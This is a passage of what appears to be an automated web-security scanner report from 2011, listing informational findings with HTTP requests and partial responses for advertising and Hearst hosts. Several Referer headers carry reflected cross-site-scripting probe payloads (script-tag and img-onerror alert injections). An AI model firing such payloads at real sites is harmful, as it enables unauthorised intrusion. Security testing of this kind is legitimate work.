Set-Cookie: FSETN002315724=uid=17417248; expires=Sun, 18-Sep-2011 16:38:20 GMT; domain=.adsfac.us; path=/
Set-Cookie: UserID=983108392662652; expires=Mon, 17-Oct-2011 16:38:20 GMT; domain=.adsfac.us; path=/
P3P: CP="NOI DSP COR CUR PSA OUR BUS UNI NAV INT"
Date: Sat, 17 Sep 2011 16:38:19 GMT
Connection: close

<html><head></head><body><script type="text/javascript">var fd_imp='http://adsfac.us/creative.asp?CreativeID=39594';var fd_clk='http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUlTQiwUs97GUoORfCML_fSCJZ25FnZW8sd
...[SNIP]...
25.14. http://advertising.aol.com/nai/nai.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /nai/nai.php

Request

GET /nai/nai.php?action_id=3 HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:43:54 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Content-Type: text/html
Content-Length: 13500


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script>

   // dynamic variables
   var numFrames = 9;
   var redirectUrlNoCookie = "http://www.networkadvertising.org/verify/no_cookie.gif";
   var redire
...[SNIP]...
25.15. http://amch.questionmarket.com/adscgen/d_layer.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/d_layer.php

Request

GET /adscgen/d_layer.php?sub=amch&type=d_layer&survey_num=918801&lang=&from_node=28067&site=8 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://www.kaboodle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-1_400008029877-5-1_43741102-3-1; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0_913132-c5?|M-0_924563-#^>|M-Us; linkjumptest=1; LP=1316276716

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:37:58 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b202.dl
Content-Type: text/html
Content-Length: 12137

var DL_HideSelects = true;
var DL_HideObjects = false;
var DL_HideIframes = false;
var DL_Banner; // Will be bound to the DIV element representing the layer
var DL_ScrollState = 0;
var DL_width;
var D
...[SNIP]...
25.16. http://amch.questionmarket.com/adscgen/dynamiclink.js.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/dynamiclink.js.php

Request

GET /adscgen/dynamiclink.js.php?sub=amch&type=d_layer&survey_num=918801&lang=&from_node=28067&site=8 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://www.kaboodle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-1_400008029877-5-1_43741102-3-1; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0_913132-c5?|M-0_924563-#^>|M-Us; linkjumptest=1

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:37:56 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b103.dl
Set-Cookie: LP=1316277476; expires=Wed, 21 Sep 2011 20:37:56 GMT; path=/; domain=.questionmarket.com
Content-Length: 2417
Content-Type: text/html

(function(){
var d=document,w=window,dle;

function ff(){
var p=w.parent,r;

while (p != top) {
try {
if (p.location.host == w.location.host)
   r = p.document.referrer;
} catch (e) { }

p = p.paren
...[SNIP]...
25.17. http://amch.questionmarket.com/adscgen/st.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/st.php

Request

GET /adscgen/st.php?survey_num=926534&site=67859363&code=43407795&randnum=2910935 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/?b1903%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E43727dda065=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: linkjumptest=1; LP=1316276716; CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-1_400008029877-5-1_43741102-3-1_43407814-6-1_43624044-35-1; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0_913132-c5?|M-0_924563-#^>|M-Us_926534-vu@|M-0_927907-{w@|M-0

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:34:52 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
DL_S: b103.dl
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Content-Length: 1815
Content-Type: text/html

(function() {
var rp=parseFloat("100"),r=Math.random()*10000,s_id="DL_926534_6_43407795",w=window,d=document;

var swid = "";
if ('' != "") {
   var tags = document.getElementsByTagN
...[SNIP]...
25.18. http://an.tacoda.net/an/slf.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://an.tacoda.net
Path:   /an/slf.htm

Request

GET /an/slf.htm?siteid=15545&dt HTTP/1.1
Host: an.tacoda.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/?b1903%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E43727dda065=1

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "1cc213016e51864377940853cee98e64:1189689957"
Last-Modified: Thu, 13 Sep 2007 13:25:57 GMT
Content-Type: text/html
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Vary: Accept-Encoding
Cache-Control: max-age=900
Date: Sat, 17 Sep 2011 16:35:39 GMT
Content-Length: 1665
Connection: close
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"

<html>
<script type=text/javascript language=javascript>
var url = unescape(document.location.href).toLowerCase();
if (url.indexOf('?') > 0)
{
var siteid = 0;

...[SNIP]...
25.19. http://api.uproxx.com/ulink/feed  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.uproxx.com
Path:   /ulink/feed

Request

GET /ulink/feed?pid=163&limit=12&c_cats=3,15,17,&uw_nsfw=false&format=json HTTP/1.1
Host: api.uproxx.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:14:44 GMT
Server: Apache
Connection: close
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 4543

UPROXXJSON(
[{"category":"Web Culture","content_title":"UPROXX Interview With Charlie Day","image_url":"http:\/\/ua.uproxxcdn.com\/6PxEor9uKEjF6Lm.jpg","content_clicks":"10982","source_title":"Uproxx"
...[SNIP]...
25.20. http://bs.serving-sys.com/BurstingPipe/adServer.bs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2501484&PluID=0&w=300&h=250&ord=%time%&ucm=true&ncu=$$http://clk.specificclick.net/click/v=5;m=2;l=24537;c=176617;b=1043680;ts=1316276625;dct=$$ HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61686642?t=1316294694453&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.seattlepi.com%2F&refer=http%3A%2F%2Fhearst.com%2Fnewspapers%2Fseattlepicom.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ebOptOut=TRUE

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sat, 17 Sep 2011 16:23:45 GMT
Connection: close
Content-Length: 1698

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...
25.21. http://content.pulse360.com/535BB4CE-7CD8-11E0-8B1F-79D9E4064C68  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://content.pulse360.com
Path:   /535BB4CE-7CD8-11E0-8B1F-79D9E4064C68

Request

GET /535BB4CE-7CD8-11E0-8B1F-79D9E4064C68 HTTP/1.1
Host: content.pulse360.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61721100?t=1316296570568&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.seattlepi.com%2F&refer=http%3A%2F%2Fwww.seattlepi.com%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pulse360-opt-out=1

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:55:01 GMT
Server: Barista/1.1
Connection: Keep-Alive
Content-Type: text/html
p3p: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Content-Length: 13385

document.write('<style type="text/css"> div#p360-hybrid300x250TriadBlackBlue-535BB4CE-7CD8-11E0-8B1F-79D9E4064C68 { width: 300px; left: 0; font-family: sans-serif; position: relative; di
...[SNIP]...
25.22. http://contextweb.pixel.invitemedia.com/context_sync  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://contextweb.pixel.invitemedia.com
Path:   /context_sync

Request

GET /context_sync?call_type=iframe HTTP/1.1
Host: contextweb.pixel.invitemedia.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://bh.contextweb.com/bh/visitormatch
Cookie: segments_p1="eJzjYuFo+MjIxcLR3McEJDs7mIFk73EQu+8+iD1xOwuQnAQkOTmmBwj8utv2BSQw8wdIydw/ICUL74AMWPQHJHLsNYi9rBEkvhEoy8yxNg9IrM8D8deDdG4Cq9gBJneCrd4NZu8Dk/vB5Gmw6UfB7GPfQezT70HsM2DyAljkEljNLbDzboPJuUAXcHLcjxZ4/uPNZxagrc9zgaL3J4LkPnwA6fwCJr8DSWaOfxwA98xIvg=="; exchange_uid=eyIyIjogWyIyMjMwNjE2MjU1NTY5NzE1ODc3IiwgNzM0Mzg3XSwgIjQiOiBbIkNBRVNFRGxwczBXRFF6TF9zR0NPQ2RlekdZTSIsIDczNDM4NV19; uid=776b70d9-5df4-4d1b-98af-982dd1709cac; subID="{}"; impressions="{\"726143\": [1312827315+ \"01026648-7049-425e-a7ce-9a7cb258a341\"+ 70243+ 29835+ 1365]+ \"778530\": [1312501863+ \"7260679259817030178\"+ 162013+ 105345+ 12332]}"; camp_freq_p1="eJzjkuH4dZZZgFFi8/mGTywKjBrvQbQBowWYzyXCca2PHSj7/MGbjywKDBoMBgwWDAD8gxIK"; io_freq_p1="eJzjEuZY5SzAKLH5fMMnFgNGCzDNJczRmgEUfP7gzUcWBQYNBgMGCwYAJnoNKA=="; dp_rec="{\"2\": 1312827317+ \"4\": 1312827314}"; partnerUID="eyIxMTUiOiBbIjRlMzcxMDQ0MzJmZTExNDgiLCB0cnVlXSwgIjE5OSI6IFsiQkI0MEFFQTI5RUFFQjNGMDBCOTI1ODkzOUZDMEQ3RjMiLCB0cnVlXSwgIjE2OSI6IFsiNGUzNzEwNDQzMmZlMTE0OCIsIHRydWVdLCAiODQiOiBbIkVhemJWWUdKOTk5cjZZa20iLCB0cnVlXSwgIjc5IjogWyIwMTU4ZDY0NjgyZjA2YmY4OTcyYjAyYzk4NzU5NTRkOSIsIHRydWVdfQ=="; conversions="{\"70914\": 1315307386+ \"61326\": 1315307639}"

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 17:05:03 GMT
Pragma: no-cache
Content-Type: text/html
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 151
Connection: close
Server: Jetty(7.3.1.v20110307)

<html><body><img width="0" height="0" src="http://bh.contextweb.com/bh/rtset?do=add&pid=538569&ev=cee046d8-41c5-4e6a-bed7-eafff2c70056"/></body></html>
25.23. http://corporate.local.com/mk/get/advertising-opportunities  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://corporate.local.com
Path:   /mk/get/advertising-opportunities

Request

GET /mk/get/advertising-opportunities HTTP/1.1
Host: corporate.local.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.local.com/
Cookie: sid=88811a43-0af3-4ba9-88a3-70e025fb1d32; localcom=cid=710&loc=Dallas%2c+TX&zip=75201&kw=&uid=23621f6d-15b3-4a75-bfd2-b297c2a7c0ab&expdate=634544410222441200; localcom_yb=cid=&sid=1e153b27-a9cd-45a3-8cf7-8c3ec8b313ac&exp=634518508222441200; session_start_time=1316295497762; k_visit=1; s_cc=true; campid=710; s_nr=1316295523375; s_sq=%5B%5BB%5D%5D; scorecardresearch=645461750-1183165914-1316295498491; __utma=177062200.605228499.1316295499.1316295499.1316295499.1; __utmb=177062200.1.10.1316295499; __utmc=177062200; __utmz=177062200.1316295499.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; s_vi=[CS]v1|273A6659051D259E-40000130E002F1B9[CE]; __qca=P0-1368744640-1316295502134; k_push8=1

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 17 Sep 2011 16:57:34 GMT
Server: Microsoft-IIS/6.0
Content-Type: text/html

<!doctype html>

<html lang="en" class="no-js">

<head>

       <title>Exact Match Local Business Solutions : Local.com - 800-984-4155</title>

       <meta name="description" content="Exact Match L
...[SNIP]...
25.24. http://corporate.local.com/mk/get/contact-us  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://corporate.local.com
Path:   /mk/get/contact-us

Request

GET /mk/get/contact-us HTTP/1.1
Host: corporate.local.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://corporate.local.com/mk/get/advertising-opportunities
Cookie: sid=88811a43-0af3-4ba9-88a3-70e025fb1d32; localcom=cid=710&loc=Dallas%2c+TX&zip=75201&kw=&uid=23621f6d-15b3-4a75-bfd2-b297c2a7c0ab&expdate=634544410222441200; localcom_yb=cid=&sid=1e153b27-a9cd-45a3-8cf7-8c3ec8b313ac&exp=634518508222441200; session_start_time=1316295497762; k_visit=1; s_cc=true; campid=710; s_nr=1316295534475; s_sq=%5B%5BB%5D%5D; scorecardresearch=645461750-1183165914-1316295498491; __utma=177062200.605228499.1316295499.1316295499.1316295499.1; __utmb=177062200.1.10.1316295499; __utmc=177062200; __utmz=177062200.1316295499.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; s_vi=[CS]v1|273A6659051D259E-40000130E002F1B9[CE]; __qca=P0-1368744640-1316295502134; k_push8=1; JSESSIONID=f83097412fe16$5Cg$F0

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 17 Sep 2011 16:58:04 GMT
Server: Microsoft-IIS/6.0
Pragma: no-cache
Expires: -1
Cache-Control: no-cache
Content-Type: text/html

<!doctype html>

<html lang="en" class="no-js">

<head>

       <title>Contact Us : Local.com</title>

       <meta name="description" content="." />

       <meta name="keywords" content="" />

       <m
...[SNIP]...
25.25. http://d3.zedo.com/jsc/d3/ff2.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d3.zedo.com
Path:   /jsc/d3/ff2.html

Request

GET /jsc/d3/ff2.html?n=1302;c=108;s=23;d=9;w=300;h=250;l=http://adclick.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DBv5EW4c10TvnKJYHEjQSIhYGOCbjvnLsCAAAAEAEgADgAWIDJ4IomYMkGggEXY2EtcHViLTM4Nzc4Mzk5OTA4ODM1NDSyAQ53d3cuZ2F0aGVyLmNvbboBCWdmcF9pbWFnZcgBCdoBpgFodHRwOi8vd3d3LmdhdGhlci5jb20vNDI2ZDglM0NpbWclMjBzcmMlM0RhJTIwb25lcnJvciUzRGFsZXJ0KDEpJTNFMzFiN2M2MDY1ZDY3YWRhOWQ_cmVjZW50SWQ9MTY4ODg0OTg4OTI0MTk2MyZxdWFsaXR5Q29tbWVudFdpZHRoPTM1MCZ1cmw9aHR0cDovL3d3dy5nYXRoZXIuY29tJTJGJl894AECwAIC4AIA6gIPNjQ5Ni9nYXRoZXIuY29t-ALw0R6AAwGQA9AFmAPgA6gDAeAEAaAGFg%26num%3D0%26sig%3DAOD64_32XMtgfOze2kI-VZyCpPKOdmdRqw%26client%3Dca-pub-3877839990883544%26adurl%3D HTTP/1.1
Host: d3.zedo.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gather.com/426d8%3Cimg%20src%3da%20onerror%3dalert(1)%3E31b7c6065d67ada9d?recentId=1688849889241963&qualityCommentWidth=350&url=http%3A%2F%2Fwww.gather.com%2F&_=
Cookie: FFgeo=5386156; ZFFBbh=977B826,20|633_962#7Z695_955#5Z332_950#4; ZEDOIDA=mLs5ThcyantsGCRD8ld6EMRU~080311; ZFFAbh=946B826,20|332_950#369Z695_955#374Z633_962#381; FFAbh=950B305,20|145_2#371Z494_1#392Z458_1#371:809,20|10_1#365Z3_1#392; FFBbh=962B305,20|145_2#3Z494_1#37Z458_1#0:809,20|10_1#0Z3_1#15; FFMCap=2457960B933,196008:826,114248|0,1#0,24:1,1#0,24; PI=h842216Za680391Zc826000471,826000471Zs318Zt1246; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Last-Modified: Tue, 13 Sep 2011 04:47:39 GMT
ETag: "3a9d45b-a35-4accb57d8b0c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 2613
Cache-Control: max-age=51932
Expires: Sun, 18 Sep 2011 07:30:23 GMT
Date: Sat, 17 Sep 2011 17:04:51 GMT
Connection: close

<!-- Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved. -->
<html>
<head>
<script language="JavaScript">
var r3=new Image();var zzblist=new Array();var zzllist=new Array();var zzl;var zzStart=new
...[SNIP]...
25.26. http://fls.doubleclick.net/activityi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Request

GET /activityi;src=3094658;type=non-c499;cat=unive790;u1=[bread%20crumb];ord=1;num=6572872332762.927? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.manilla.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Set-Cookie: test_cookie=; domain=.doubleclick.net; path=/; Max-Age=0; expires=Mon, 21-July-2008 23:59:00 GMT
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Sat, 17 Sep 2011 16:35:58 GMT
Expires: Sat, 17 Sep 2011 16:35:58 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
Content-Length: 789
X-XSS-Protection: 1; mode=block

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><img height="1" widt
...[SNIP]...
25.27. http://hearst.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hearst.com
Path:   /

Request

GET / HTTP/1.1
Host: hearst.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:22:30 GMT
Server: Apache/2.2.3 (Linux/SUSE)
X-Powered-By: PHP/5.2.5
Content-Type: text/html
Content-Length: 12826

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>Hearst Corporation</title>
<meta name="keywords" content=
...[SNIP]...
25.28. http://hearst.com/about-hearst/corporate-george-r-hearst-jr.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hearst.com
Path:   /about-hearst/corporate-george-r-hearst-jr.php

Request

GET /about-hearst/corporate-george-r-hearst-jr.php HTTP/1.1
Host: hearst.com
Proxy-Connection: keep-alive
Referer: http://hearst.com/about-hearst/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:23:00 GMT
Server: Apache/2.2.3 (Linux/SUSE)
X-Powered-By: PHP/5.2.5
Content-Type: text/html
Content-Length: 13460

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>Hearst Corporation</title>
<meta name="keywords" content=
...[SNIP]...
25.29. http://hearst.com/about-hearst/corporate-mark-e-aldam.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hearst.com
Path:   /about-hearst/corporate-mark-e-aldam.php

Request

GET /about-hearst/corporate-mark-e-aldam.php HTTP/1.1
Host: hearst.com
Proxy-Connection: keep-alive
Referer: http://hearst.com/about-hearst/corporate-george-r-hearst-jr.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:23:04 GMT
Server: Apache/2.2.3 (Linux/SUSE)
X-Powered-By: PHP/5.2.5
Content-Type: text/html
Content-Length: 13962

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>Hearst Corporation</title>
<meta name="keywords" content=
...[SNIP]...
25.30. http://hearst.com/about-hearst/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hearst.com
Path:   /about-hearst/index.php

Request

GET /about-hearst/index.php HTTP/1.1
Host: hearst.com
Proxy-Connection: keep-alive
Referer: http://hearst.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:22:47 GMT
Server: Apache/2.2.3 (Linux/SUSE)
